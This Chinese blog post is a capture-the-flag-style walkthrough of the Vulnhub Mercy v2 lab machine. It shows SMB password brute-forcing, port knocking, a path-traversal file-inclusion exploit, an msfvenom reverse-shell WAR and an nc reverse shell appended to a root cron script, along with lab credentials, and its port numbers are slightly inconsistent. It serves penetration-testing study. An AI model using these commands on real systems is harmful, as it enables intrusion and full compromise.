OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2

最新推荐文章于 2023-12-22 17:58:07 发布
最新推荐文章于 2023-12-22 17:58:07 发布
阅读量1k 收藏 1
点赞数
分类专栏: OSCP练习 vulnhub靶机通关 文章标签: php 安全 tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/127867461
版权

nmap扫下端口
nmap -sS -sV 192.168.8.144
发现22、80是关的,应该需要敲门
在这里插入图片描述

8080是tomcat页面,但是manager没密码控制台进不去,
提示主机管理器 Web 应用仅限于角色为“admin-gui”的用户。用户在中定义。/etc/tomcat7/tomcat-users.xml
在这里插入图片描述

web暂时没发现线索,尝试攻击Samba
smbclient -NL 192.168.8.144 看一下共享名,发现存在qiu用户
在这里插入图片描述

爆破qiu的密码
hydra -l qiu -P /usr/share/wordlists/fasttrack.txt -e nsr smb://192.168.8.144
发现 密码为password
smbclient \\192.168.8.144\qiu -U qiu
在这里插入图片描述

发现config文件,get到本地

在这里插入图片描述

查看config中的配置,发现开80端口需要敲157、27391、4端口 。开20端口要敲17301、28504、9999

在这里插入图片描述

knock 192.168.8.144 159 27391 4 17301 28504 9999 用knock进行敲门打开80和22
在这里插入图片描述

在这里插入图片描述

dirb爆一下目录,发现robots文件得到mercy、nomercy两个目录

在这里插入图片描述

nomercy目录下是rips0.53的页面
在这里插入图片描述

再exploit-db里搜素rips0.53漏洞,发现存在本地文件包含漏洞
https://www.exploit-db.com/exploits/18660
在这里插入图片描述

成功包含passed
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/passwd
在这里插入图片描述

尝试包含一开始获取到的/tomcat-users.xml
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/tomcat7/tomcat-users.xml
在这里插入图片描述

username=“thisisasuperduperlonguser” password="heartbreakisinevitable"成功登录tomcat控制台
在这里插入图片描述

上传个jsp马,需要提前打个war包,也可用msf生成一个
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.8.130 LPORT=7777 -f war -o shell.war

在这里插入图片描述

成功上传
在这里插入图片描述

tnmedxmp.jsp
监听端口
在这里插入图片描述

python生成交互shell:python -c ‘import pty;pty.spawn(“/bin/bash”)’
尝试su到fluffy用户
username=“fluffy” password=“freakishfluffybunny”
在/home/fluffy/.private/secrets下发现timeclock权限为777
在这里插入图片描述

发现可以同步时间,推测应该会周期执行
在这里插入图片描述

直接写个反弹shell进去,等一小会
echo “rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.8.143 8888 1>/tmp/p” >>timeclock
在这里插入图片描述

root用户确实有timeclock的定时任务
在这里插入图片描述

Forest深林
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulhub —— MERCY-v2 实战
战神/calmness的博客
12-24 1350
目录 目标 环境 过程 信息收集 nmap扫描 访问8080端口页面 目录遍历 dirb gobuster manager页面 扫描nikto 枚举 用户enum4linux 版本信息 搜索tomcat 漏洞 访问共享 搜索漏洞rips 0.53 文件包含 配置信息tomcat7/tomcat-users.xml 获得用户名和密码 文件上传 获取shell 信息扫描 LinEnum.sh扫描到的用户: linux-exploit-suggester.sh 收集
Vulnhub:Digitalworld.local (Mercy v2)靶机
qq_43884092的博客
04-10 467
使用enum4linux对目标smb服务进行枚举,8080端口的网站robots.txt提示存在一个文件访问该文件得到一串base64加密的密文,之后对密文进行解密,解密密文提示存在一个密码:password,使用用户qiu和密码:password,查看目标文件共享,在\\.private\opensesame目录下存放有两个文件,查看configprint发现是一个脚本,其中把/etc/knockd.conf配置文件追加到config文件中,使用knock进行端口碰撞开启22和80端口
靶机渗透练习55-digitalworld.localMERCY v2
hirak0的博客
04-19 7198
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ Description MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. 😃 MERCY is a name-play
vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 & smb & 端口敲门 & RIPS & tomcat & linux 提权)
冬萍子癸水
04-25 1179
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap PORT STATE SERVICE REASON VERSION 22/tcp filtered ssh port-unreach...
Vulnhub靶机 Digitalworld.local (Mercy v2)
菜浪马废的博客
05-04 451
i在这里插入图片描述 敲门呗 还可以内核提权
vulnhub mercy v2
mrwangtw的博客
02-21 1606
nmap扫描主机和开放的端口 靶机IP:10.0.2.52 进入8080端口 发现 host-manager需要输入用户名和密码 gobuster扫描 进入robots 进入上述目录 放在解密网站里解密 It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords tha...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
OSCP2020:个人使用的工具和脚本
05-30
OSCP2020 个人使用的工具和脚本
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
OSCP2018十一月考试指导.pdf
11-02
OSCP最新考试2018十一月考试指导,有截图, OSCP 考试是安全考试
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
红队打靶练习:DIGITALWORLD.LOCAL: MERCY V2
最新发布
分享
12-22 578
红队打靶练习:DIGITALWORLD.LOCAL: MERCY V2 , 犹如猛犬撕咬般的疼痛感......
VulnHub】【2023年07月18日】最新全部靶场详情(中)
惟忆
07-18 8922
VulnHub】【2023年07月18日】最新全部靶场详情(中)
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 2973
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7940
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2300
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
漏洞靶场实战-Vuluhub medium_socnet
qq_53058639的博客
02-04 495
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
OSCP练习vulhub靶机TR0LL 2攻略
weixin_47311099的博客
04-22 4344
信息收集 主机发现 先用namp做个扫描 在这里插入图片描述 发现21ftp、22ssh、80http 网站信息收集 访问web页面,跟上一关一样没啥东西 爆一下网站目录 发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破 果然又发现了几个路径,但是所有页面都是同一个图…以及一句话… 但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样! 看一眼图片二进制发现重要信息,y0ur_self会是突破电 strings cat_t
OSCP练习vulhub靶机TR0LL 3攻略
weixin_47311099的博客
10-25 336
OSCP练习vulhub靶机TR0LL 2攻略
OSCP渗透测试实战:VulnHub精选漏洞机器
"《OSCP Like Vulns Machines》是一份专注于网络安全渗透测试的资料,由Joas Antonio整理并分享。这份文档汇集了各类VulnHub平台上的实战型虚拟机(VM)环境,这些虚拟机被精心设计,旨在供网络安全专业人员进行专业...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值